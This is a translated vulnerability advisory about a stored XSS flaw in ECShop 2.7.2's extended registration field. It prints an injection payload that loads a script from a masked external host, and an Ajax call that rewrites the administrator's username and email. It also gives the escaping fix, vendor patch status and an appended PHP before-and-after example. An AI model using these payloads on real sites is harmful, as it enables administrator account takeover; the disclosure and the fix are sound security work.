Ecshop 2.7.2 persistent XSS to obtain administrator account - vulnerability warning - the black bar safety net

2010-10-21T00:00:00
ID MYHACK58:62201028155
Type myhack58
Reporter Anonymous
Modified 2010-10-21T00:00:00

Description

Vulnerability details

Brief description:

In the personal data modification form, the filtering of JavaScript code is not strict enough, so the XSS code is written directly into the database.

Detailed description:


The password-protection question field is the only one not run through the regex filter; the other fields are. We can enter XSS in the password-protection question, but the back-end member information view does not display the password-protection question, so this requires that the site back-end has added a custom "member registration" field, since the back-end member information view does display such fields. Fill that field with an include of an external js file:

"><script src="http://www.***.com/test.js" type="text/javascript"></script>

The external test.js file contains the following:

Ajax.call('privilege.php?act=update', 'id=1&user_name=heihei&email=10001@qq.com', '', 'POST', 'JSON');

Vulnerability proof:


Repair solutions:

Line 504 of the program

$temp_field_content = strlen($_POST[$extend_field_index]) > 100 ? mb_substr($_POST[$extend_field_index], 0, 99) : $_POST[$extend_field_index];

Modified to

$temp_field_content = strlen($_POST[$extend_field_index]) > 100 ? mb_substr(htmlspecialchars($_POST[$extend_field_index]), 0, 99) : htmlspecialchars($_POST[$extend_field_index]);
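As an added example (not ECShop's own code), the extended-field handling of line 504 before and after the fix above, with the write-up's payload run through both; the explicit ENT_QUOTES/UTF-8 arguments in the patched version are an addition to the page's fix, because before PHP 8.1 the htmlspecialchars() defaults leave single quotes unencoded.

```php
<?php
// Added example, not ECShop's own code: the extended registration field
// as stored before and after the fix, with the write-up's payload run
// through both so the difference is visible.

// Original line 504: only the length is enforced, so markup reaches the
// database and is rendered verbatim in the admin member-information view.
function store_extend_field_vulnerable(string $raw): string
{
    return strlen($raw) > 100 ? mb_substr($raw, 0, 99) : $raw;
}

// Patched line 504: htmlspecialchars() turns < > " & into entities before
// the value is stored, so the admin view shows the payload as text.
// ENT_QUOTES and the charset are explicit here (an addition to the page's
// fix): before PHP 8.1 the default flags leave single quotes unencoded,
// which matters if a template ever places the value in a '-quoted attribute.
function store_extend_field_patched(string $raw): string
{
    $safe = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return strlen($raw) > 100 ? mb_substr($safe, 0, 99) : $safe;
}

// Payload from the write-up (domain elided as on the page).
$payload = '"><script src="http://www.***.com/test.js" type="text/javascript"></script>';

echo "vulnerable: ", store_extend_field_vulnerable($payload), "\n";
echo "patched:    ", store_extend_field_patched($payload), "\n";

// Caveats for defenders: strlen() counts bytes while mb_substr() counts
// characters, and the patched branch truncates after escaping, so a long
// value can be cut inside an entity such as &quot;. That is inert text, not
// an XSS risk, but the stored value is now HTML-encoded and must not be
// escaped a second time (or decoded) when displayed or exported.
```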


Vulnerability response

Vendor response:

Hazard rating: medium

Vulnerability Rank: 8th

Confirmation time: 2010-09-21

Vendor reply:

It has been confirmed; a patch will be released later.

Latest status:

2010-09-25: patch download address: http://bbs.ecshop.com/thread-138506-1-1.html